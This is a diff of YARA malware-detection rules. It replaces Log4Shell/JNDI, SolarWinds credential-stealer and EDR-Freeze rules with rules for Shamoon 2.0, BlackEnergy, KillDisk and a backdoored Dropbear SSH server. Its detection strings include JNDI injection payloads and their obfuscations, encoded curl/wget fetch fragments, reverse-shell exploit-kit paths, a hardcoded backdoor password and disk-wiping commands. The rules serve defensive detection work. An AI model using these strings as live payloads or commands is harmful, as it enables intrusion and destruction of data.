-rule SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1
+rule SIGNATURE_BASE_Shamoon2_Comcomp : FILE
 {
 	meta:
-		description = "Detects JNDI Exploit Kit patterns in files"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9127dd2-b818-5ca8-877a-3c47b1e92606"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://github.com/pimps/JNDI-Exploit-Kit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L16-L49"
+		description = "Detects Shamoon 2.0 Communication Components"
+		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
+		id = "72068264-4f71-59fb-b3d8-938285ec8c7f"
+		date = "2016-12-01"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L30-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9442c8c4eee76539892752361657c86e80acc7990876e787317b042a4637f669"
-		score = 60
-		quality = 85
-		tags = ""
-
-	strings:
-		$x01 = "/Basic/Command/Base64/"
-		$x02 = "/Basic/ReverseShell/"
-		$x03 = "/Basic/TomcatMemshell"
-		$x04 = "/Basic/JettyMemshell"
-		$x05 = "/Basic/WeblogicMemshell"
-		$x06 = "/Basic/JBossMemshell"
-		$x07 = "/Basic/WebsphereMemshell"
-		$x08 = "/Basic/SpringMemshell"
-		$x09 = "/Deserialization/URLDNS/"
-		$x10 = "/Deserialization/CommonsCollections1/Dnslog/"
-		$x11 = "/Deserialization/CommonsCollections2/Command/Base64/"
-		$x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/"
-		$x13 = "/Deserialization/Jre8u20/TomcatMemshell"
-		$x14 = "/TomcatBypass/Dnslog/"
-		$x15 = "/TomcatBypass/Command/"
-		$x16 = "/TomcatBypass/ReverseShell/"
-		$x17 = "/TomcatBypass/TomcatMemshell"
-		$x18 = "/TomcatBypass/SpringMemshell"
-		$x19 = "/GroovyBypass/Command/"
-		$x20 = "/WebsphereBypass/Upload/"
-		$fp1 = "<html"
+		logic_hash = "edebdbcf17bd9fadc67c7d76839cf569f0ea20127d4e0d216411c35e9ba54208"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
+
+	strings:
+		$s1 = "mkdir %s%s > nul 2>&1" fullword ascii
+		$s2 = "p[%s%s%d.%s" fullword ascii
+		$op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
+		$op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
+		$op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1 : CVE_2021_44228
+rule SIGNATURE_BASE_Eldos_Rawdisk : FILE
 {
 	meta:
-		description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
-		author = "Florian Roth (Nextron Systems)"
-		id = "82cf337e-4ea1-559b-a7b8-512a07adf06f"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L51-L66"
+		description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
+		author = "Florian Roth (Nextron Systems) (with Binar.ly)"
+		id = "8a43f425-86b7-5a05-b7c3-13c78aa905f8"
+		date = "2016-12-01"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/jKIfGB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon2.yar#L50-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "98eabec4ad2f5c4d22db9c3bebdc82c8dc6723599748360875fc7b613b1019ab"
-		score = 60
+		logic_hash = "ab09371b91ab6889f342c7992108ad374b5ecf67b6c2144a6282670f177d0f15"
+		score = 50
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = "FILE"
+		hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
+		hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
 
 	strings:
-		$xa1 = "header with value of BadAttributeValueException: "
-		$sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
-		$sa2 = "Error looking up JNDI resource"
+		$s1 = "g\\system32\\" wide
+		$s2 = "ztvttw" fullword wide
+		$s3 = "lwizvm" fullword ascii
+		$s4 = "FEJIKC" fullword ascii
+		$s5 = "INZQND" fullword ascii
+		$s6 = "IUTLOM" fullword wide
+		$s7 = "DKFKCK" fullword ascii
+		$op1 = { 94 35 77 73 03 40 eb e9 }
+		$op2 = { 80 7c 41 01 00 74 0a 3d }
+		$op3 = { 74 0a 3d 00 94 35 77 }
 
 	condition:
-		$xa1 or all of ( $sa* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft : FILE CVE_2021_44228
+rule SIGNATURE_BASE_Blackenergy_BE_2 : FILE
 {
 	meta:
-		description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
+		description = "Detects BlackEnergy 2 Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87e536a5-cc11-528a-b100-4fa3b2b7bc0c"
-		date = "2021-12-10"
-		modified = "2025-03-24"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L68-L92"
+		id = "c93991b9-77e8-5a73-80ef-e21df770c3a5"
+		date = "2015-02-19"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/DThzLz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L8-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61a005060e2041afa5a9aa0b2a5e26cfc9a53cbafa78b15e4dd2c3b38127373a"
-		score = 50
+		hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+		logic_hash = "77ecab353063bf8be5ec70294f8497234af8ddd944e0b207d8d633f59f76dbb6"
+		score = 75
 		quality = 85
-		tags = "FILE, CVE-2021-44228"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x01 = "${jndi:ldap:/"
-		$x02 = "${jndi:rmi:/"
-		$x03 = "${jndi:ldaps:/"
-		$x04 = "${jndi:dns:/"
-		$x05 = "${jndi:iiop:/"
-		$x06 = "${jndi:http:/"
-		$x07 = "${jndi:nis:/"
-		$x08 = "${jndi:nds:/"
-		$x09 = "${jndi:corba:/"
-		$fp1 = "<html"
-		$fp2 = "/nessus}"
+		$s0 = "<description> Windows system utility service  </description>" fullword ascii
+		$s1 = "WindowsSysUtility - Unicode" fullword wide
+		$s2 = "msiexec.exe" fullword wide
+		$s3 = "WinHelpW" fullword ascii
+		$s4 = "ReadProcessMemory" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC : CVE_2021_44228
+rule SIGNATURE_BASE_Blackenergy_VBS_Agent : FILE
 {
 	meta:
-		description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
+		description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d7c4092a-6ffc-5a89-b73a-f7f0ac984cbd"
-		date = "2021-12-12"
-		modified = "2021-12-13"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L94-L116"
+		id = "0876f752-d476-5706-918e-edfda9bd7928"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L34-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00231db2ae83a89c187dbde1f2bc67fdaedcf1cbdf872afdcc374d2d0abee515"
-		score = 60
+		hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
+		logic_hash = "2a0037a76f1031117fe41b2e41691511eb626ffc0c738547eda24f771505bc67"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "$%7Bjndi:"
-		$x2 = "%2524%257Bjndi"
-		$x3 = "%2F%252524%25257Bjndi%3A"
-		$x4 = "${jndi:${lower:"
-		$x5 = "${::-j}${"
-		$x6 = "${${env:BARFOO:-j}"
-		$x7 = "${::-l}${::-d}${::-a}${::-p}"
-		$x8 = "${base64:JHtqbmRp"
-		$fp1 = "<html"
+		$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
+		$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
+		$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard : FILE CVE_2021_44228
+rule SIGNATURE_BASE_Dropbear_SSH_Server : FILE
 {
 	meta:
-		description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
-		author = "Florian Roth"
-		id = "5297c42d-7138-507d-a3eb-153afe522816"
-		date = "2021-12-10"
-		modified = "2025-03-20"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L118-L140"
+		description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "22595d8b-b7ea-570e-ad17-d5bcec613abf"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L51-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a4fc285dd1680ebc8a1042eeb5fbba73b9e2df70678adf3163122d84405325e"
-		score = 65
-		quality = 60
-		tags = "FILE, CVE-2021-44228"
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+		logic_hash = "6b8acaaa64329d09d3d22d74f4f40288fba3f5faaff63e1ee6b2e6153f14d730"
+		score = 50
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
-		$x2 = "Reference Class Name: foo"
-		$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fp1 = "/QUALYSTEST" ascii
-		$fp2 = "w.nessus.org/nessus"
-		$fp3 = "/nessus}"
+		$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
+		$s2 = "Badly formatted command= authorized_keys option" fullword ascii
+		$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
+		$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
+		$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21 : CVE_2021_44228
+rule SIGNATURE_BASE_Blackenergy_Backdoorpass_Dropbear_SSH : FILE
 {
 	meta:
-		description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
+		description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "09abc4f0-ace7-5f53-b1d3-5f5c6bf3bdba"
-		date = "2021-12-10"
-		modified = "2021-12-13"
-		reference = "https://twitter.com/Reelix/status/1469327487243071493"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L142-L165"
+		id = "60db00dd-72b3-5a28-90de-2a397b1e007b"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L71-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "703a83916c7279bcdc3cd61602472c2a3815140235be169f5b2063a547438c61"
-		score = 70
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+		logic_hash = "3af58d155691d9323458280ad1b933e8e784acafb0974f5f267b93d9b02e825e"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "Y3VybCAtcy"
-		$sa2 = "N1cmwgLXMg"
-		$sa3 = "jdXJsIC1zI"
-		$sb1 = "fHdnZXQgLXEgLU8tI"
-		$sb2 = "x3Z2V0IC1xIC1PLS"
-		$sb3 = "8d2dldCAtcSAtTy0g"
-		$fp1 = "<html"
+		$s1 = "passDs5Bu9Te7" fullword ascii
 
 	condition:
-		1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and $s1
 }
-rule SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21 : FILE
+rule SIGNATURE_BASE_Blackenergy_Killdisk_1 : FILE
 {
 	meta:
-		description = "Detects indicators of JDNI usage in log files and other payloads"
+		description = "Detects KillDisk malware from BlackEnergy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2df8b8f3-8d8d-5982-8c85-692b7d91ebb2"
-		date = "2021-12-10"
-		modified = "2021-12-12"
-		reference = "https://github.com/flypig5211/JNDIExploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L167-L180"
+		id = "304e7aa3-48d3-5015-aaf1-6b1df2441b75"
+		date = "2016-01-03"
+		modified = "2023-12-05"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L88-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7886a67672001f0db72575d96d3a12341bfcdc49a9951e3d5e2a88ab46bf5a5d"
-		score = 70
-		quality = 60
+		logic_hash = "fa64434422a16166938b9eede9c50b79bae90632f1500e6529dcf26dbebe50f1"
+		score = 80
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
+		hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
+		$s0 = "system32\\cmd.exe" fullword ascii
+		$s1 = "system32\\icacls.exe" fullword wide
+		$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
+		$s3 = "shutdown /r /t %d" fullword ascii
+		$s4 = "/C /Q /grant " fullword wide
+		$s5 = "%08X.tmp" fullword ascii
+		$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
+		$s7 = "/c format %c: /Y /Q" fullword ascii
+		$s8 = "taskhost.exe" fullword wide
+		$s9 = "shutdown.exe" fullword wide
 
 	condition:
-		filesize < 100MB and $xr1
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 8 of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1 : CVE_2021_44228 FILE
+rule SIGNATURE_BASE_Blackenergy_Killdisk_2 : FILE
 {
 	meta:
-		description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
+		description = "Detects KillDisk malware from BlackEnergy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b8f56711-7922-54b9-9ce2-6ba05d64c80d"
-		date = "2021-12-11"
-		modified = "2022-11-08"
-		reference = "https://twitter.com/testanull/status/1469549425521348609"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L182-L211"
+		id = "f0304e87-a278-5963-9af0-935c088c00ec"
+		date = "2016-01-03"
+		modified = "2023-01-06"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L117-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d6ffb70da82fe16e7a76feb31c01aa3e0cfc5625cc0e2b237ec851c646550839"
-		score = 60
+		logic_hash = "38ce9ab347690914f27e7ae89cc6fb2af02ee223e21822eb3b75fde772d3eaff"
+		score = 80
 		quality = 85
-		tags = "CVE-2021-44228, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$f1 = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
-		$f2 = { 24 7B 75 70 70 65 72 3A ?? 7D }
-		$x3 = "$%7blower:"
-		$x4 = "$%7bupper:"
-		$x5 = "%24%7bjndi:"
-		$x6 = "$%7Blower:"
-		$x7 = "$%7Bupper:"
-		$x8 = "%24%7Bjndi:"
-		$fp1 = "<html"
+		$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
+		$s1 = "%s%08X.tmp" fullword ascii
+		$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
+		$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
 
 	condition:
-		(1 of ( $x* ) or filesize < 200KB and 1 of ( $f* ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
+rule SIGNATURE_BASE_Blackenergy_Driver_USBMDM : FILE
 {
 	meta:
-		description = "Detects error messages related to JDNI usage in log files that can indicate a Log4Shell / Log4j exploitation"
+		description = "Black Energy Driver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68bcf043-58b4-54a9-b024-64871b5d535f"
-		date = "2021-12-10"
-		modified = "2023-06-23"
-		reference = "https://twitter.com/marcioalm/status/1470361495405875200?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L213-L226"
+		id = "d5e8faf0-38cb-5193-b859-83ea09278011"
+		date = "2016-01-04"
+		modified = "2023-12-05"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L140-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ab98814b2ed66b0bda875fecc0b09db82035d7edcdb0af65f815817ec8c6cc8"
-		score = 70
+		logic_hash = "273a00de7af1b7490bff2eae545b358a5483bae0d55a560bef7bd9fa24b0f1d9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
+		hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
+		hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
+		hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
+		hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
+		hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
+		hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
+		hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
 
 	strings:
-		$x1 = "FATAL log4j - Message: BadAttributeValueException: "
+		$s1 = "USB MDM Driver" fullword wide
+		$s2 = "KdDebuggerNotPresent" fullword ascii
+		$s3 = "KdDebuggerEnabled" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Solarwinds_Credential_Stealer : FILE
+rule SIGNATURE_BASE_Blackenergy_Driver_AMDIDE : FILE
 {
 	meta:
-		description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns"
-		author = "Arnim Rupp"
-		id = "87dba889-367a-5fc3-b5e0-eb8e3c36a5e9"
-		date = "2021-01-20"
+		description = "Black Energy Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5b57c33-87f7-5411-995c-384e0afa0348"
+		date = "2016-01-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/mubix/solarflare"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_solarwinds_credential_stealer.yar#L2-L27"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L165-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4"
-		hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc"
-		logic_hash = "ccf55ba7b66ff8d0f926999f3d68dc3b2fdc1c9ce15e1f08b75d003c62393312"
+		logic_hash = "cb6017327be464bcc2d9efca676c58a9ede45d122460bc167f87e78880c4ace5"
 		score = 75
-		quality = 51
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
+		hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
+		hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
+		hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
+		hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
+		hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
+		hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
 
 	strings:
-		$certificate = "CN=SolarWinds-Orion" ascii nocase wide
-		$credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide
-		$credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide
-		$credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide
-		$credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide
-		$sql1 = "encryptedkey" ascii nocase wide fullword
-		$sql2 = "protectiontype" ascii nocase wide fullword
-		$sql3 = "CredentialProperty" ascii nocase wide fullword
-		$sql4 = "passwordhash" ascii nocase wide fullword
-		$sql5 = "credentialtype" ascii nocase wide fullword
-		$sql6 = "passwordsalt" ascii nocase wide fullword
+		$s1 = " AMD IDE driver" fullword wide
+		$s2 = "SessionEnv" fullword wide
+		$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
+		$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_EDR_Freeze_Sep25_2 : FILE
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_1 : FILE
 {
 	meta:
-		description = "Detects EDR-Freeze hacktool"
+		description = "Detects indicators of obfuscation in Windows Batch files"
 		author = "Florian Roth"
-		id = "1446a128-47ee-51a4-9d69-326dfd0d8267"
-		date = "2025-09-30"
-		modified = "2025-09-30"
-		reference = "https://github.com/TwoSevenOneT/EDR-Freeze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_edr_freeze_sep25.yar#L1-L35"
+		id = "801e7efc-2c31-5590-afcd-9e11072c9c65"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_bat_obfusc_jul24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "735d56839f17ca98a0022e6044b8d0bc43201b48e3a64c7b671c417f62749643"
-		score = 80
+		logic_hash = "683f4651eb8c5b74eca16e7f97c5c44f0d70f045ea49f1f3726cb6975aba2ab9"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "193ca17f574fa5e23866560170425f83696f78e83dabd7e831dd7827a69283fd"
